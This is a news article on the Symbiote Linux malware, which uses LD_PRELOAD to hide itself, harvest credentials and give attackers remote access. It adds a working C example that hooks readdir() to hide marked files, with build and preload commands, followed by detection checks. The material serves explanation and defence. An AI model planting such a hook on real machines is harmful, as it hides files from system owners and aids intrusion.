New hard-to-detect malware discovered on Linux-based systems
Earlier this week, researchers from Blackberry and Intezer released information on a hard-to-detect Linux malware targeting Latin American financial institutions. Known as Symbiote, the threat gives an attacker the ability to harvest credentials and gain remote access to the target machine. Once a machine is infected, the malware hides its own presence on the system, which makes it extremely difficult to detect.
Intezer’s Joakim Kennedy and the Blackberry Research and Intelligence Team found that the threat is delivered as a shared object library (SO) rather than as a typical executable file that a user must run to infect a host. On an infected machine the dynamic linker loads the SO into processes as they start, so the malware runs inside other programs rather than as a process of its own.
An infected machine gives the threat actor the ability to harvest credentials, use remote access capabilities and execute commands with elevated privileges they would not otherwise have. The malware is loaded before any other shared object through the dynamic linker's LD_PRELOAD mechanism, which helps it avoid detection. Because it is loaded first, its functions take precedence over those exported by libraries loaded later, such as libc, so it can intercept (hook) the calls that applications make to those libraries and alter what they return.
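The following is an added example, written for this page and not Symbiote's code or anything published by the researchers, showing the LD_PRELOAD interposition described above in its simplest form: a shared object that shadows libc's readdir() and drops directory entries whose name contains a marker, so every dynamically linked program that lists a directory stops seeing them. The marker string, the file names and the library name are assumptions made for the example.

```c
/* Added example, not Symbiote's code: a minimal LD_PRELOAD interposer that
 * hides directory entries whose name contains a marker. Build it as a shared
 * object and preload it; every dynamically linked program that lists a
 * directory through readdir() then stops seeing those entries.
 *
 *   gcc -shared -fPIC -o libhide.so hide.c -ldl
 *   touch /tmp/magic_secret.txt
 *   LD_PRELOAD=./libhide.so ls /tmp        # magic_secret.txt is not shown
 *   ls /tmp                                # still there without the preload
 *
 * The marker "magic_" and the file names are constructed for this example.
 */
#define _GNU_SOURCE          /* needed for RTLD_NEXT */
#include <dirent.h>
#include <dlfcn.h>
#include <stdio.h>
#include <string.h>

static const char HIDE_MARKER[] = "magic_";   /* constructed marker */

/* Pure decision function, kept separate so the hiding policy can be tested
 * without installing the hook. Returns 1 if the entry should be hidden. */
int should_hide(const char *name)
{
    return name != NULL && strstr(name, HIDE_MARKER) != NULL;
}

/* Interposed readdir(): because a preloaded object is searched before libc,
 * this definition shadows libc's readdir for every caller in the process.
 * RTLD_NEXT resolves the real implementation further down the search order,
 * which is how a preloaded library "leverages" the libraries loaded after it. */
struct dirent *readdir(DIR *dirp)
{
    static struct dirent *(*real_readdir)(DIR *) = NULL;
    if (real_readdir == NULL) {
        /* POSIX idiom for storing a dlsym() result in a function pointer. */
        *(void **)(&real_readdir) = dlsym(RTLD_NEXT, "readdir");
        if (real_readdir == NULL)
            return NULL;   /* cannot reach libc's readdir; fail closed */
    }
    struct dirent *ent;
    while ((ent = real_readdir(dirp)) != NULL) {
        if (!should_hide(ent->d_name))
            return ent;    /* ordinary entries pass through unchanged */
        /* marked entry: skip it so the caller never sees it */
    }
    return NULL;           /* end of directory */
}

/* Stand-alone demo: lists a directory through the hooked readdir() above. */
int main(int argc, char **argv)
{
    const char *path = argc > 1 ? argv[1] : ".";
    DIR *d = opendir(path);
    if (d == NULL) {
        perror("opendir");
        return 1;
    }
    struct dirent *ent;
    while ((ent = readdir(d)) != NULL)
        printf("%s\n", ent->d_name);
    closedir(d);
    return 0;
}
```

The same pattern applied to functions such as fopen(), read() or the libpcap capture routines is what lets a preloaded implant filter what a process sees of files, processes and network traffic. It also points at the practical check: a statically linked binary, or one that calls the getdents64 system call directly, does not go through the hook, so comparing its view of a directory with that of a normal dynamically linked tool exposes hidden entries. Likewise, inspect /etc/ld.so.preload, the LD_PRELOAD variable in /proc/PID/environ and the libraries listed in /proc/PID/maps for objects that do not belong there, keeping in mind that a full rootkit of this kind will also hook the calls used to read those files, so run the checks with static tooling or from outside the host.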